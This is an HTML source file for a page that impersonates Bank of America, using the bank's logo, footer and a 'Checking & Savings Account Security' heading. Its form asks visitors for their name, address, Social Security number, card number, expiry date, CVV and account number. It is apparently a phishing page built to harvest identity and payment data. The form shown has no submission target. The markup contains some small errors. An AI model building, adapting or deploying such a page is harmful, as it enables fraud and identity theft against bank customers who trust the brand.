<!DOCTYPE html>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Login Page</title>
    <style>
        Body {
            font-family: Calibri, Helvetica, sans-serif;
            background-color: white;
        }

        button {
            background-color: blue;
            width: 100%;
            color: white;
            padding: 15px;
            margin: 10px 0px;
            border: none;
            cursor: pointer;
        }

        form {
            border: 3px solid #f1f1f1;
        }

        input[type=text],
        input[type=password] {
            width: 100%;
            margin: 8px 0;
            padding: 12px 20px;
            display: inline-block;
            border: 2px solid black;
            box-sizing: border-box;
        }

        button:hover {
            opacity: 0.7;
        }

        .cancelbtn {
            width: auto;
            padding: 10px 18px;
            margin: 10px 5px;
        }

        .container {
            padding: 25px;
            background-color: lightgrey;
        }

        .ameridian-heading {
            color: white;
            font-size: 20px;
            text-align: center;
            position: relative;
            z-index: 1;
            font-family: "Times New Roman", Times, serif;
        }

        .ameridian-heading::before {
            content: "";
            position: absolute;
            bottom: -35px;
            left: 50%;
            transform: translateX(-50%);
            width: 1500px;
            height: 80px;
            background-color: red;
        }

        .sub-heading {
            font-size: 20px;
            text-align: center;
        }

        .left-column {
            float: left;
            width: 50%;
            padding-right: 10px;
            box-sizing: border-box;
        }

        .right-column {
            float: right;
            width: 50%;
            padding-left: 10px;
            box-sizing: border-box;
        }

        .continue-line {
            height: 90px;
            width: 100%;
            background-color: white;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .continue-line p {
            color: blue;
            text-align: center;
            font-size: 13px;
            margin: 0;
            padding-top: 5px;
        }

        .container::after {
            content: "";
            display: table;
            clear: both;
        }

        .search-bar {
            display: flex;
            align-items: center;
            margin-left: 70px;
            
        }

        .search-input {
            width: 17px;
            padding: 6px;
            margin-leftt: 6px;
        }

        .search-button {
            background-color: grey;
            color: white;
            border: none;
            padding: 15px px;
            cursor: pointer;
        }

        .expiry-select {
            display: flex;
            justify-content: flex-start;
            align-items: center;
            margin-top: 12px;
        }

        .expiry-select select {
            width: 100px;
            padding: 15px;
            margin-right: 0px;
        }
        .home {
    color: black;
}
.contact-us {
    color: black;
}

button[type="submit"] {
    background-color: blue;
    width: 40%;
    color: white;
    padding: 15px;
    margin: 10px 0px;
    border: none;
    cursor: pointer;
    border-radius: 5px; 
}
.button-container {
    text-align: right;
}


    </style>
</head>

<body>
    <div style="display: flex; align-items: center; justify-content: center;">
        <img src="https://logos-world.net/wp-content/uploads/2020/11/Bank-of-America-Logo.png" width="300" height="200">
         <p style="font-size: 17px; margin-left: 10px;">Privacy & Security</p>
        <div class="search-bar">
           
            <input class="search-input" type="text" placeholder="How can we help you?">
            <button class="search-button">Search</button>
        </div>
    </div>
    <center>
        <h1 class="ameridian-heading">
            <span style="position: relative;">Checking &amp; Savings Account Security from Bank of America</span>
        </h1>
    </center>
    <
    <form>
        <div class="container">
            <div class="left-column">
    <label><span style="color: black; font-weight: bold;">First Name:</span></label>
    <input type="text" placeholder="First Name" name="firstname" required>
    <label><span style="color: black; font-weight: bold;">Last Name:</span></label>
    <input type="text" placeholder="Last Name" name="lastname" required>
    <label><span style="color: black; font-weight: bold;">Address:</span></label>
    <input type="text" placeholder="Address" name="address" required>
    <label><span style="color: black; font-weight: bold;">City:</span></label>
    <input type="text" placeholder="City" name="city" required>
    <label><span style="color: black; font-weight: bold;">Zip Code:</span></label>
    <input type="text" placeholder="Zip Code" name="zipcode" required>
    <label><span style="color: black; font-weight: bold;">Social Security Number:</span></label>
    <input type="text" placeholder="*** ** *** " name="social security number" required>
</div>


           <div class="right-column">
    <label><span style="color: black; font-weight: bold;">Mobile Number:</span></label>
    <input type="text" placeholder="Mobile Number" name="mobile" required>
    <label><span style="color: black; font-weight: bold;">Email Address:</span></label>
    <input type="text" placeholder="Email Address" name="email" required>
    <label><span style="color: black; font-weight: bold;">Card Number:</span></label>
    <input type="text" placeholder="*********" name="cardnumber" required>
    <label><span style="color: black; font-weight: bold;">Expiry Date:</span></label>
    <div class="expiry-select">
        <select name="expiry-month">
            <option value="" disabled selected>Month</option>
             <option value="01">01</option>
                <option value="02">02</option>
                <option value="03">03</option>
                <option value="04">04</option>
               <option value="05">05</option>
               <option value="06">06</option>
               <option value="07">07</option>
               <option value="08">08</option>
               <option value="09">09</option>
               <option value="10">10</option>
               <option value="11">11</option>
               <option value="12">12</option>
        </select>
        <select name="expiry-year">
            <option value="" disabled selected>Year</option>
           <option value="2022">2022</option>
                <option value="2023">2023</option>
                <option value="2024">2024</option>
                <option value="2025">2025</option>
                <option value="2026">2026</option>
                <option value="2027">2027</option>
                <option value="2028">2028</option>
                <option value="2029">2029</option>
                <option value="2020">2030</option>
        </select>
    </div>
    <label><span style="color: black; font-weight: bold;">CVV:</span></label>
    <input type="text" placeholder="CVV" name="cvv" required>
    <label><span style="color: black; font-weight: bold;">Account Number:</span></label>
    <input type="text" placeholder="Account Number" name="account Number" required>
</div>
            <div class="continue-line">
                <div>
                    <p><span class="home">Home</span> | Accessible banking | Privacy & Security | Careers | Site Map | Advertising Practices</p>
                    <div style="text-align: center; font-size: 13px; margin-top: 5px;">Bank of America, N.A. Member FDIC Equal Housing Lender</div>
                     <div style="text-align: center; font-size: 13px; margin-top: 5px;">© 2022 Bank of America Corporation</div>
                </div>
                <div style="display: flex; align-items: center;">
                   <p class="contact-us">Contact Us</p>

                    <img src="https://upload.wikimedia.org/wikipedia/commons/b/b8/2021_Facebook_icon.svg" width="20" height="20" style="margin-left: 5px;">
                    <img src="https://upload.wikimedia.org/wikipedia/commons/e/e7/Instagram_logo_2016.svg" width="20" height="20" style="margin-left: 5px;">
                    <img src="https://upload.wikimedia.org/wikipedia/commons/c/ca/LinkedIn_logo_initials.png" width="20" height="20" style="margin-left: 5px;">
                    <img src="https://upload.wikimedia.org/wikipedia/commons/0/08/Pinterest-logo.png" width="20" height="20" style="margin-left: 5px;">
                    <img src="https://upload.wikimedia.org/wikipedia/commons/6/6f/Logo_of_Twitter.svg" width="20" height="20" style="margin-left: 5px;">
                    <img src="https://upload.wikimedia.org/wikipedia/commons/4/4f/YouTube_social_white_squircle.svg" width="20" height="20" style="margin-left: 5px;">
                </div>
            </div>







        </div>
    </form>
</body>

</html>